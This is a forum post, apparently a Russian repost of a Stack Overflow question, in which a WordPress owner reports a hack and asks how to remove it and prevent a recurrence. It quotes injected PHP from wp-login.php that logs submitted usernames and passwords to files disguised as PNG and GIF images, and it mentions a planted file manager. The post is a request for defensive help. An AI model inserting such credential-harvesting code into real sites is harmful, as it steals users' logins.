Обнаружены подозрительные коды, извлечены учетные данные для входа из PNG-файла! (взломал WP)Php

Кемеровские программисты php общаются здесь
Anonymous
Обнаружены подозрительные коды, извлечены учетные данные для входа из PNG-файла! (взломал WP)

Сообщение Anonymous »

Привет, ребята. Надеюсь, у вас все хорошо.
Я столкнулся с этой странной проблемой и буду признателен за любую помощь. Вот объяснение:
сегодня утром, когда я входил в систему wp-admin, я увидел предупреждение «Неопределенный ключ массива «pwd» в /public_html/wp-login.php в строке 1285»!
Вот линия 1285:

Код: Выделить всё

/*login wp*/if($_POST['pwd']){    $m="Username:".$_POST['log']."
Password:".$_POST['pwd']."
IP:".$_SERVER["REMOTE_ADDR"]."
Time:".date("Y-m-d H:i:s",time())."
INFO:".$_SERVER['HTTP_USER_AGENT']."

";    @fwrite(fopen("wp-admin/images/list.png","a+"),$m);    @fwrite(fopen("wp-includes/images/xit.gif","a+"),$m);}
Как вы можете видеть, учетные данные записываются в PNG-файл в папке /wp-admin/!
Кроме того, в той же папке есть файл index.php, я попробовал открыть /wp-admin/index.php и был в шоке! :
Файловый менеджер?
ПРАВИЛЬНО, ФАЙЛОВЫЙ МЕНЕДЖЕР! как же это произошло?
Кто-нибудь может объяснить, как это произошло? и как его удалить?
У меня уже есть чистая резервная копия, но, поскольку я впервые сталкиваюсь с такой проблемой, я хочу узнать больше о том, как предотвратить/преодолеть ту же проблему в будущее.
Спасибо всем.

Подробнее здесь: https://stackoverflow.com/questions/787 ... -hacked-wp

Вернуться в «Php»